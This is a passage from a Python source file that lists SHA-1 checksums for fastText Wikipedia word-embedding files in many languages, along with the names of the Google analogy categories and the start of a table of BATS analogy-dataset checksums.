'4beb7025cf88f1aa62d025b187f0cb09aee61858'), 'wiki.eu':\n ('wiki.eu.npz', '5e1a8197e35f20a2476798bbb935b4c131289c4f'), 'wiki.ext':\n ('wiki.ext.npz', '049b2d1b0a8b102b45907cf487cac30aa294e0a0'), 'wiki.fa':\n ('wiki.fa.npz', '81ed274997c87ef87d73d25e166ca06272ce426f'), 'wiki.ff':\n ('wiki.ff.npz', '4867dc74cd53ca0b0f769af4fa1ea420406b59bf'), 'wiki.fi':\n ('wiki.fi.npz', '6d1291b854045179f8171ac7d62ede7d8ac159a2'),\n 'wiki.fiu_vro': ('wiki.fiu_vro.npz',\n 'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'), 'wiki.fj': ('wiki.fj.npz',\n 'cf5c31b0a69276f5dd18ab738ed92444abaeb755'), 'wiki.fo': ('wiki.fo.npz',\n 'ffc19807d528af000861a94cfb8097bd686e14fc'), 'wiki.fr': ('wiki.fr.npz',\n '8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'), 'wiki.frp': (\n 'wiki.frp.npz', 'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'), 'wiki.frr':\n ('wiki.frr.npz', 'fa5e5c39ea2a45793c679eacea290a35e37405ea'),\n 'wiki.fur': ('wiki.fur.npz', 'a61a8940d059f25000e3fe23933e5ed0d37e65d3'\n ), 'wiki.fy': ('wiki.fy.npz',\n '46f9f41bdf6f4fb8e27a753290413d745465963b'), 'wiki.gag': (\n 'wiki.gag.npz', '49fb01230e6803544122d47ab7d3fe694d1444f2'), 'wiki.gan':\n ('wiki.gan.npz', '716b7b26acc15975f30caf3c6effa111516fcca5'), 'wiki.ga':\n ('wiki.ga.npz', 'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'), 'wiki.gd':\n ('wiki.gd.npz', '597017b5a32d933f194595d3656f858e37e70a62'), 'wiki.glk':\n ('wiki.glk.npz', '91a5834658bc2d48714e8807ef24efb79567b4b5'), 'wiki.gl':\n ('wiki.gl.npz', '2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'), 'wiki.gn':\n ('wiki.gn.npz', 'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'), 'wiki.gom':\n ('wiki.gom.npz', '8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),\n 'wiki.got': ('wiki.got.npz', 'd05daf105611150695e61775fdff2c500b36be3f'\n ), 'wiki.gu': ('wiki.gu.npz',\n '0ce175c5fc39bab4032892f70c9d2bb850af0f4a'), 'wiki.gv': ('wiki.gv.npz',\n '2c573f873d607831ff01b64603c17b8db79bd7e1'), 'wiki.hak': (\n 'wiki.hak.npz', 'e6048727799cdf149f5c50037e0fc59300d33a94'), 'wiki.ha':\n ('wiki.ha.npz', 'f18ea7286bbd390c5470896b2c99cb1adc740064'), 'wiki.haw':\n ('wiki.haw.npz', '18bcd85d2e06b1b889f0835fc5b62697fdf32d72'), 'wiki.he':\n ('wiki.he.npz', '76915ff167b6ecb7b7e22ff0ca46914a55d344af'), 'wiki.hif':\n ('wiki.hif.npz', '12153aaf98d76d5502ab77a27cd0b9a539f61513'), 'wiki.hi':\n ('wiki.hi.npz', '249666a598991f6ec147954c6af9e531fd1cd94e'), 'wiki.ho':\n ('wiki.ho.npz', '3f804fd69780c0789708b56ea9d48715f8e38f26'), 'wiki.hr':\n ('wiki.hr.npz', '9a3de28e69f97048bfb480b4f83eaab6149f66ad'), 'wiki.hsb':\n ('wiki.hsb.npz', '7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'), 'wiki.ht':\n ('wiki.ht.npz', 'a607093d511afeb584d02dc676bc5a27eff66287'), 'wiki.hu':\n ('wiki.hu.npz', '9b2c4750daf1bcf39768572e874b5afda0e2f0bc'), 'wiki.hy':\n ('wiki.hy.npz', 'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'), 'wiki.hz':\n ('wiki.hz.npz', '5dfb8afbdae6b4148c3e55ab459c56a74b46b463'), 'wiki.ia':\n ('wiki.ia.npz', '4cfaaf053b9513bbf5b2423258c0f01d20256de6'), 'wiki.id':\n ('wiki.id.npz', 'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'), 'wiki.ie':\n ('wiki.ie.npz', '1bae7256c2e763ce6d692d1c0a603d99a8b22826'), 'wiki.ig':\n ('wiki.ig.npz', '23128e54a5e143891d392d621723bad9cfc8cf7b'), 'wiki.ii':\n ('wiki.ii.npz', '54bc16d05da512481865a89ecf30260b0acc04dc'), 'wiki.ik':\n ('wiki.ik.npz', 'f8015227e893d2375699b7d132b306ba381f02ac'), 'wiki.ilo':\n ('wiki.ilo.npz', '185a11f81bd5d24a34558dda81ee4735f5ba150b'), 'wiki.io':\n ('wiki.io.npz', 'ddf8180a90aa6ee5be93a2582cc99c535f21363e'), 'wiki.is':\n ('wiki.is.npz', '968f8dd2a093b279a6f7aaa734008454bf51d724'), 'wiki.it':\n ('wiki.it.npz', 'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'), 'wiki.iu':\n ('wiki.iu.npz', 'fa8896730bd6c24c3473daa22116d1016294e7f7'), 'wiki.jam':\n ('wiki.jam.npz', 'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'), 'wiki.ja':\n ('wiki.ja.npz', '8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'), 'wiki.jbo':\n ('wiki.jbo.npz', '145fc999ab004b348cf9bf445f0a93a7a145308b'), 'wiki.jv':\n ('wiki.jv.npz', '66978770bf06e42414395cf5fd8c596044d72bec'), 'wiki.kaa':\n ('wiki.kaa.npz', '624a640ecb9901b2aba2e9f44ab615146ecb2862'),\n 'wiki.kab': ('wiki.kab.npz', 'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'\n ), 'wiki.ka': ('wiki.ka.npz',\n '1ca8376e1e0cbd58001c1b51a2d488a2874a6743'), 'wiki.kbd': (\n 'wiki.kbd.npz', 'f2d2a05b06723ac549784ad5470d84f5742a1352'), 'wiki.kg':\n ('wiki.kg.npz', 'fa7f6d5f660a173a3e75342d449980eedcdc789e'), 'wiki.ki':\n ('wiki.ki.npz', '21a8c7c616c0050c51c288861f3423f313e4f634'), 'wiki.kj':\n ('wiki.kj.npz', 'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'), 'wiki.kk':\n ('wiki.kk.npz', 'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'), 'wiki.kl':\n ('wiki.kl.npz', 'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'), 'wiki.km':\n ('wiki.km.npz', 'e053799fd01463808432dc035bef3e36620e2f36'), 'wiki.kn':\n ('wiki.kn.npz', '2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'), 'wiki.koi':\n ('wiki.koi.npz', 'a9b02e9bd41833bcd54769f94626019c03f29997'), 'wiki.ko':\n ('wiki.ko.npz', '764d9896e74b5a26c6884d48bce3bed8ed3a7822'), 'wiki.krc':\n ('wiki.krc.npz', 'bfe39598c718f1cc95909db7544b3214b308a97c'), 'wiki.kr':\n ('wiki.kr.npz', '1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'), 'wiki.ksh':\n ('wiki.ksh.npz', '66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'), 'wiki.ks':\n ('wiki.ks.npz', '85f1adaa05b854df4dede745a1aaab3836e60770'), 'wiki.ku':\n ('wiki.ku.npz', 'faf90584e5a45e6d0f9eeb88399b82abe037d584'), 'wiki.kv':\n ('wiki.kv.npz', '9f2b41822013a412da9c99fac06eed8be03ca192'), 'wiki.kw':\n ('wiki.kw.npz', '3eed8a8fc97a2fc79241b8474a458c98d00fc897'), 'wiki.ky':\n ('wiki.ky.npz', '0116ff90f10a6c0728e1ea86d8a44896ea83270a'), 'wiki.lad':\n ('wiki.lad.npz', '5af2015b3d1c5e8563f0e92721580988ebe2ce50'), 'wiki.la':\n ('wiki.la.npz', '7143303a3ea13c7668eb90ea6e3d2ca69857a3be'), 'wiki.lbe':\n ('wiki.lbe.npz', 'f206a3c35a184ba5d2b32ee68640eadf66c847da'), 'wiki.lb':\n ('wiki.lb.npz', '143dc6337f3690379282034c460c613d7f144923'), 'wiki.lez':\n ('wiki.lez.npz', 'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'), 'wiki.lg':\n ('wiki.lg.npz', '866640ce62cedbc1d453b7ea3c289c291ad76e13'), 'wiki.lij':\n ('wiki.lij.npz', '0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'), 'wiki.li':\n ('wiki.li.npz', '4666b3c238256d7b7623a136db19b8b9f4754734'), 'wiki.lmo':\n ('wiki.lmo.npz', 'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'), 'wiki.ln':\n ('wiki.ln.npz', 'fba158719944aabe58e0002a90be0ed77e11702d'), 'wiki.lo':\n ('wiki.lo.npz', '1e113e340a8a93d385e14502c9c4e3bcdf6c3101'), 'wiki.lrc':\n ('wiki.lrc.npz', '42cb755f398fba6f0da7949c91e92b55654bd482'),\n 'wiki.ltg': ('wiki.ltg.npz', '182f75859e228d1162215f28fe7f2dca127624a4'\n ), 'wiki.lt': ('wiki.lt.npz',\n '66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'), 'wiki.lv': ('wiki.lv.npz',\n '2be8f926da85694fa998bf79d80b61ebb8d67576'), 'wiki.mai': (\n 'wiki.mai.npz', 'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),\n 'wiki.map_bms': ('wiki.map_bms.npz',\n '6f0394d6b3d08a946e3df4b9355efe94148f018a'), 'wiki.mdf': (\n 'wiki.mdf.npz', '774ee35334641db57f9ac9069961c5372a5d92e8'), 'wiki.mg':\n ('wiki.mg.npz', '496c48ef668f08ce95ebb11ce1ce5026b52d935c'), 'wiki.mh':\n ('wiki.mh.npz', '352edd84f99c5aa277a7306f6cacea1fab065ed3'), 'wiki.mhr':\n ('wiki.mhr.npz', 'dd78b27a674ac10411cdf74ac32f9391506b17e0'),\n 'wiki.min': ('wiki.min.npz', '628b406441ab03bc8aa68195ada50bfdc8226f34'\n ), 'wiki.mi': ('wiki.mi.npz',\n '754127b473861cd4f9ae034c9f527a34827b1f00'), 'wiki.mk': ('wiki.mk.npz',\n 'b09fed4f56c296f13c4020ef1fec498382a38b73'), 'wiki.ml': ('wiki.ml.npz',\n '02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'), 'wiki.mn': ('wiki.mn.npz',\n '08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'), 'wiki.mo': ('wiki.mo.npz',\n '638c2e8bd2352fd52921b9ae62f578b8357bab49'), 'wiki.mrj': (\n 'wiki.mrj.npz', 'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'), 'wiki.mr':\n ('wiki.mr.npz', '074dd68c947c2f137a3e84b55012925f00213139'), 'wiki.ms':\n ('wiki.ms.npz', '3dbe9e9d70251de8a374776ff1250a9c3103ee59'), 'wiki.mt':\n ('wiki.mt.npz', 'f5103998a68d1b178387417436a83123d44aba01'),\n 'wiki.multi.ar': ('wiki.multi.ar.npz',\n 'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'), 'wiki.multi.bg': (\n 'wiki.multi.bg.npz', 'c04018f3a600cee170f12a36cdd35b4727a2aade'),\n 'wiki.multi.ca': ('wiki.multi.ca.npz',\n 'eef52a0cf20c133ca9065de25f0702861a8cfa29'), 'wiki.multi.cs': (\n 'wiki.multi.cs.npz', 'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),\n 'wiki.multi.da': ('wiki.multi.da.npz',\n '24374f2ee169b33327feeee46da31b0de1622fe4'), 'wiki.multi.de': (\n 'wiki.multi.de.npz', '2e6c119b345bebd34b56eaaf855d6703889b11f7'),\n 'wiki.multi.el': ('wiki.multi.el.npz',\n '9d122beedb80a2e5334946641e5bafd32c01e76b'), 'wiki.multi.en': (\n 'wiki.multi.en.npz', '8c3c480b4cb2690304173713a646280613b244a8'),\n 'wiki.multi.es': ('wiki.multi.es.npz',\n '483a22656e4fb2a01e9f4ef8156b261e780850ab'), 'wiki.multi.et': (\n 'wiki.multi.et.npz', '22498c7b91645a3874fa738b5cfb16bf98b6f97c'),\n 'wiki.multi.fi': ('wiki.multi.fi.npz',\n '765a6f0b63777bff4ae6ca2b461c5889c03d6a70'), 'wiki.multi.fr': (\n 'wiki.multi.fr.npz', 'decd9aacf600114b8a36072535c0309874a37c83'),\n 'wiki.multi.he': ('wiki.multi.he.npz',\n '7eee940c1b85936f59122f4b1a166223dd946674'), 'wiki.multi.hr': (\n 'wiki.multi.hr.npz', '1673963416af088f8bf15576afb33d58115db35c'),\n 'wiki.multi.hu': ('wiki.multi.hu.npz',\n 'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'), 'wiki.multi.id': (\n 'wiki.multi.id.npz', '6c3e721febb511ede7db7bf978d65769e4270f5c'),\n 'wiki.multi.it': ('wiki.multi.it.npz',\n 'fc5bfc11e0165e8d95c1708573dad5e456826c73'), 'wiki.multi.mk': (\n 'wiki.multi.mk.npz', '6cd50198355674f156fc863108d9bebf11cfabd9'),\n 'wiki.multi.nl': ('wiki.multi.nl.npz',\n '4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'), 'wiki.multi.no': (\n 'wiki.multi.no.npz', '63756168c1101e73fba8d1a5015f32b8892819e6'),\n 'wiki.multi.pl': ('wiki.multi.pl.npz',\n '958b8e8bead965ba1bb1433e1c960fc3e12a10fb'), 'wiki.multi.pt': (\n 'wiki.multi.pt.npz', '22f07df1609d79b95344ee575ea43141424a1528'),\n 'wiki.multi.ro': ('wiki.multi.ro.npz',\n '73180b3e382519004bf38ea7b86237aacbbe813a'), 'wiki.multi.ru': (\n 'wiki.multi.ru.npz', '3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),\n 'wiki.multi.sk': ('wiki.multi.sk.npz',\n '606a0c3ba9849070c6b6b8c22d920fdeed9a1385'), 'wiki.multi.sl': (\n 'wiki.multi.sl.npz', '3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),\n 'wiki.multi.sv': ('wiki.multi.sv.npz',\n '4f1494885b9a831e87cfa3c15f2204c4a73c0779'), 'wiki.multi.tr': (\n 'wiki.multi.tr.npz', '54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),\n 'wiki.multi.uk': ('wiki.multi.uk.npz',\n '500fd26b1d7a25b42458012e99f9f76642e0c787'), 'wiki.multi.vi': (\n 'wiki.multi.vi.npz', '3955809cceb300965c15f9372221417719bb0db8'),\n 'wiki.mus': ('wiki.mus.npz', 'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'\n ), 'wiki.mwl': ('wiki.mwl.npz',\n '8a5e2c272166f8a72c5694ca6c3104d5f49179ec'), 'wiki.my': ('wiki.my.npz',\n '5e035aca16700d7d6695af8a6d3a88ac847aaeb7'), 'wiki.myv': (\n 'wiki.myv.npz', 'd4cfaab70c640033e02c0fc0c5a3615ae836c569'), 'wiki.mzn':\n ('wiki.mzn.npz', 'ad09ac584ae455b5862b95125ef409360ae18445'),\n 'wiki.nah': ('wiki.nah.npz', '2dc454ef37d059f2053af46cfa1f4f0ca939cba0'\n ), 'wiki.na': ('wiki.na.npz',\n '401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'), 'wiki.nap': (\n 'wiki.nap.npz', '996da46aeeab5644ba766d00c5e343b1553361d7'),\n 'wiki.nds_nl': ('wiki.nds_nl.npz',\n '5a9307e16b13a5a82ec19a52b33254537e7198e7'), 'wiki.nds': (\n 'wiki.nds.npz', 'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'), 'wiki.ne':\n ('wiki.ne.npz', 'a601db2647a74ffd2b4b43dcb8584735f555459c'), 'wiki.new':\n ('wiki.new.npz', 'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),\n 'wiki-news-300d-1M': ('wiki-news-300d-1M.npz',\n '0a03bbd508e5381e140476140fb121afeb0050ed'),\n 'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',\n '69edae21375407781c727dcb9e534e79d712d137'), 'wiki.ng': ('wiki.ng.npz',\n 'befd774d15f69d43547e13e5ea3a97c4cb1ab405'), 'wiki.nl': ('wiki.nl.npz',\n '5a7cb6f1dd0a7621202abba9461ac2c5bf905219'), 'wiki.nn': ('wiki.nn.npz',\n '8e5059ddeb24050fadaa5cc4622b13feb3e4a226'), 'wiki.no': ('wiki.no.npz',\n '5ce6e0f793e66f081652f64013968099de03d9f9'), 'wiki.nov': (\n 'wiki.nov.npz', '95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'), 'wiki.vec':\n ('wiki.vec.npz', '08ebb912efeb9df1c7d05e1af90484d210dff47e'),\n 'wiki.nrm': ('wiki.nrm.npz', 'e58614b4508ff9810f0b58fd818f973775bc918d'\n ), 'wiki.nso': ('wiki.nso.npz',\n '56a2ebe260241402d117cd89c5c872b9c96ff05b'), 'wiki.nv': ('wiki.nv.npz',\n 'c713051fe03ec1f60314bb42161b2a47fb5e169a'), 'wiki.ny': ('wiki.ny.npz',\n 'ba5a1725955cbc13e7fd93ab499f8085840c992c'), 'wiki.oc': ('wiki.oc.npz',\n '259e7d994c38a4cfc140fb07016b82d6781e5027'), 'wiki.olo': (\n 'wiki.olo.npz', '0fea70f887def4779ee70a79366b88f1ada65004'), 'wiki.om':\n ('wiki.om.npz', '47e2d756b5f8913085d901375c1b4e0b118a4221'), 'wiki.or':\n ('wiki.or.npz', '7e274ab060219b019aa02bb97941cc6e162fd01f'), 'wiki.os':\n ('wiki.os.npz', '19e8199cc2aaffdb07b6c558dbc5465ac6e03155'), 'wiki.pag':\n ('wiki.pag.npz', 'eddf4931547649026c02f893297ef673ec6158bb'),\n 'wiki.pam': ('wiki.pam.npz', '40109aa174bd9f0fa657839bb548e2b0646c58d3'\n ), 'wiki.pa': ('wiki.pa.npz',\n '8a5870717e9e641b1f757f13259171698118de2e'), 'wiki.pap': (\n 'wiki.pap.npz', '999c8e5b005ca20d9998fbbe4fa79177f69e24c0'), 'wiki.pcd':\n ('wiki.pcd.npz', 'e975066b323a65cdc5e4c27138ef674d2cf7250b'),\n 'wiki.pdc': ('wiki.pdc.npz', '5c770b9d56f276b0aa535845f175c05ee1cea615'\n ), 'wiki.pfl': ('wiki.pfl.npz',\n '0063d0b633ee529a75482b36ed4f4da7d64994ec'), 'wiki.pih': (\n 'wiki.pih.npz', 'ce1d76c94d248545eea0d7436c54849dbb380bfc'), 'wiki.pi':\n ('wiki.pi.npz', 'c7d56c334bf529f8b3655693d207a80feaec4aed'), 'wiki.pl':\n ('wiki.pl.npz', '0d612fdf871a1a4084c867f394940475be899443'), 'wiki.pms':\n ('wiki.pms.npz', 'ca149a2fb138011315bb6d5d61c7a5647e515e51'),\n 'wiki.pnb': ('wiki.pnb.npz', '9ec82d02ad8894056c67991cf8ce927bcca74ee2'\n ), 'wiki.pnt': ('wiki.pnt.npz',\n '3f90123407bb8fc838a0a0d3700a14e15f5b26aa'), 'wiki.ps': ('wiki.ps.npz',\n '7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'), 'wiki.pt': ('wiki.pt.npz',\n 'f172fd801edd1ad9d319ba44146d40b5d682a473'), 'wiki.qu': ('wiki.qu.npz',\n '68bec60ccfe1826c3b3a8968574488dbc74cdf7b'), 'wiki.rm': ('wiki.rm.npz',\n '00fb191fc736ba60cb23e76169dfccde9a9daad0'), 'wiki.rmy': (\n 'wiki.rmy.npz', 'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'), 'wiki.rn':\n ('wiki.rn.npz', '57b8e0d6999269be227af6ef2797a9cf8386ff1b'),\n 'wiki.roa_rup': ('wiki.roa_rup.npz',\n 'e06d6b5672a59bb9e83143bc8b28300d23c09546'), 'wiki.roa_tara': (\n 'wiki.roa_tara.npz', 'c083105f40236dc3711f06c1b40e8ee7a714b99d'),\n 'wiki.ro': ('wiki.ro.npz', '766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),\n 'wiki.rue': ('wiki.rue.npz', '9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'\n ), 'wiki.ru': ('wiki.ru.npz',\n 'd59d099481c22d5592ab9635c9ee48060aa0bf45'), 'wiki.rw': ('wiki.rw.npz',\n 'e99ee87d249f6c157c5c97397d1025d798b85c69'), 'wiki.sah': (\n 'wiki.sah.npz', '85dae39097b29bc8e2b64f343a77794e4a62f91a'), 'wiki.sa':\n ('wiki.sa.npz', '7d1928d7c67400045ac1b35a37a0e3089690d875'), 'wiki.scn':\n ('wiki.scn.npz', '27d7b8050bbeed8ce196061c610216760b053c39'), 'wiki.sc':\n ('wiki.sc.npz', '69c7b8be0f03a1bbd615695f93bdd78f96a58e16'), 'wiki.sco':\n ('wiki.sco.npz', '4880282f59d3338b67fbff75359e2d24896e95bb'), 'wiki.sd':\n ('wiki.sd.npz', '0ed8da4d27223db717a612cf0c88582351db6e19'), 'wiki.se':\n ('wiki.se.npz', '0f4b2e060d5e29f96ca73aab29c967e79db69c17'), 'wiki.sg':\n ('wiki.sg.npz', 'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'), 'wiki.sh':\n ('wiki.sh.npz', 'c13f1e94676bc939560193f7aa7ffd7d604707b3'),\n 'wiki.simple': ('wiki.simple.npz',\n '352d0575e7d60b08e1dfce2c5de713906f0ed78f'), 'wiki.si': ('wiki.si.npz',\n '204f9ffbe7770a9f56d3b2fb26999165015f5c33'), 'wiki.sk': ('wiki.sk.npz',\n '7a9820b5a343b242660bf2595d1ecbf6e00a76d6'), 'wiki.sl': ('wiki.sl.npz',\n '85f3186f26d6725317a64e290363a7251b928b81'), 'wiki.sm': ('wiki.sm.npz',\n '9e13452cc4bff677f4f15db04f9d2f95f6ec054c'), 'wiki.sn': ('wiki.sn.npz',\n 'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'), 'wiki.so': ('wiki.so.npz',\n '0f5d71b95768b33fd939a870c15344c4478364a9'), 'wiki.sq': ('wiki.sq.npz',\n '8b05826df8575e65c87a2fc0b7630cf644d4216d'), 'wiki.srn': (\n 'wiki.srn.npz', '2711396ef297ac5dde8904508bc002bdecbcc6f4'), 'wiki.sr':\n ('wiki.sr.npz', '546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'), 'wiki.ss':\n ('wiki.ss.npz', '2e5911bad79bb5270a64f587e326d31c95ec58f3'), 'wiki.st':\n ('wiki.st.npz', '23bc954719a2962e891f02efaea754c9ea025894'), 'wiki.stq':\n ('wiki.stq.npz', 'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'), 'wiki.su':\n ('wiki.su.npz', '7e48732e8a1fcf212e692924a4416a6ac3b3b055'), 'wiki.sv':\n ('wiki.sv.npz', 'b9ec52e9423688f195f3145c243226c0e0b51e83'), 'wiki.sw':\n ('wiki.sw.npz', '5262f0c645322b10eca73f792a970f10b2719e55'), 'wiki.szl':\n ('wiki.szl.npz', 'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'), 'wiki.ta':\n ('wiki.ta.npz', 'da7c5bc6e1142306ff2669bf1739832beb6c1763'), 'wiki.tcy':\n ('wiki.tcy.npz', 'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'), 'wiki.te':\n ('wiki.te.npz', 'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'), 'wiki.tet':\n ('wiki.tet.npz', '11e46a893af55344dbe102d530fdfea5d949d3bc'), 'wiki.tg':\n ('wiki.tg.npz', 'da66abb72ec9ccc602713161e544963d59cc51d7'), 'wiki.th':\n ('wiki.th.npz', '25e54bf2d305779ec9baa5f344410bd75c7702fc'), 'wiki.ti':\n ('wiki.ti.npz', '1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'), 'wiki.tk':\n ('wiki.tk.npz', '34c714fa8275fd6abfe86b2d144a043774552a6c'), 'wiki.tl':\n ('wiki.tl.npz', '7d7f8a0485155bce7a74a1d778824375b0029f53'), 'wiki.tn':\n ('wiki.tn.npz', 'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'), 'wiki.to':\n ('wiki.to.npz', 'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'), 'wiki.tpi':\n ('wiki.tpi.npz', '448cef043fa4b7f97825dbf8ee205ef05543bcac'), 'wiki.tr':\n ('wiki.tr.npz', 'c9830607a4c5134c6191006f1d80bae0ec798fe6'), 'wiki.ts':\n ('wiki.ts.npz', '84a0598803712c8a713943447ddb73fc0f39af43'), 'wiki.tt':\n ('wiki.tt.npz', '82c29df18f33e6284af3e977a6dda7e132a7a225'), 'wiki.tum':\n ('wiki.tum.npz', '358990b894a3fb09d70674465952d828c9b0eda7'), 'wiki.tw':\n ('wiki.tw.npz', '1e6d2838a4f271c1808795fb929cfcbf95094d93'), 'wiki.ty':\n ('wiki.ty.npz', 'e41ca5192d8cb515b3561c8d6935b150deb027b7'), 'wiki.tyv':\n ('wiki.tyv.npz', 'ce062ed32e854604714b65698ae290c99ba28060'),\n 'wiki.udm': ('wiki.udm.npz', '9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'\n ), 'wiki.ug': ('wiki.ug.npz',\n '656503e54063e200980e39f00fc011395bcd8551'), 'wiki.uk': ('wiki.uk.npz',\n '352b7ee24d9fc6513fff4fe13bc04086c680834a'), 'wiki.ur': ('wiki.ur.npz',\n 'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'), 'wiki.uz': ('wiki.uz.npz',\n 'd60d1e67bb8574dd71c18c88114aba674fc1eecb'), 'wiki.ve': ('wiki.ve.npz',\n '5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'), 'wiki.vep': (\n 'wiki.vep.npz', '7a94355754fbe56802242c0bf9d7a27335095552'), 'wiki.vi':\n ('wiki.vi.npz', 'f118039eb16a4ca3347b6b171eac41113350a041'), 'wiki.vls':\n ('wiki.vls.npz', '9a46a2fdc6448aa54f212081643745499ea7d05c'), 'wiki.vo':\n ('wiki.vo.npz', '8e2f93c85ac608bcc4ae14093b9ff016061378fb'), 'wiki.wa':\n ('wiki.wa.npz', '907074f7743d30cdbb2c48d0c8b4040796ea4164'), 'wiki.war':\n ('wiki.war.npz', '928fb410c394b9c18d875326b6a3e750e2611e1b'), 'wiki.wo':\n ('wiki.wo.npz', '7bb352be44f7261aa926f49b13e77df30f29312f'), 'wiki.wuu':\n ('wiki.wuu.npz', '0d1dc7b05867ff2156a1180ad3da3b4697924e59'),\n 'wiki.xal': ('wiki.xal.npz', 'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'\n ), 'wiki.xh': ('wiki.xh.npz',\n 'c64e1d2e77d1c744a628e2bd7353284616e48bea'), 'wiki.xmf': (\n 'wiki.xmf.npz', '160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'), 'wiki.yi':\n ('wiki.yi.npz', '0662542cee29f3392fc905004ac6443b32c1477c'), 'wiki.yo':\n ('wiki.yo.npz', '5d12d3b902a1fa19d8548295c3802c0608afa5c8'), 'wiki.za':\n ('wiki.za.npz', '536348ff89df62e968739b567a1245bfd4112fbe'), 'wiki.zea':\n ('wiki.zea.npz', '61fa192289a7c0f73ffa8035632a38b91c31c224'),\n 'wiki.zh_classical': ('wiki.zh_classical.npz',\n '9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'), 'wiki.zh_min_nan': (\n 'wiki.zh_min_nan.npz', '5d38bc025c82af578299d60f7df7b399de6ed81a'),\n 'wiki.zh': ('wiki.zh.npz', '94007fcf3b105bf2c21b84a3a22bdb7946e74804'),\n 'wiki.zh_yue': ('wiki.zh_yue.npz',\n 'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'), 'wiki.zu': ('wiki.zu.npz',\n 'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}\nGOOGLEANALOGY_CATEGORIES = ['capital-common-countries', 'capital-world',\n 'currency', 'city-in-state', 'family', 'gram1-adjective-to-adverb',\n 'gram2-opposite', 'gram3-comparative', 'gram4-superlative',\n 'gram5-present-participle', 'gram6-nationality-adjective',\n 'gram7-past-tense', 'gram8-plural', 'gram9-plural-verbs']\nBATS_CHECKSUMS = {\n 'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':\n 'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',\n 'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':\n '44dbc56432b79ff5ce2ef80b6840a8aa916524f9',\n 'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':\n 'dc530918e98b467b8102a7dab772a66d3db32a73',\n 'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':\n '6c6fdfb6c733bc9b298d95013765163f42faf6fb',\n 'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':\n '39fa47ec7238ddb3f9818bc586f23f55b55418d8',\n 'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':\n '8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',\n 'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':\n 'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',\n 'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':\n '5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',\n 'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':\n '377777c1e793c638e72c010228156d01f916708e',\n 'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':\n '051c0c3c633e10900f827991dac14cf76da7f022',\n 'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':\n '5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',\n 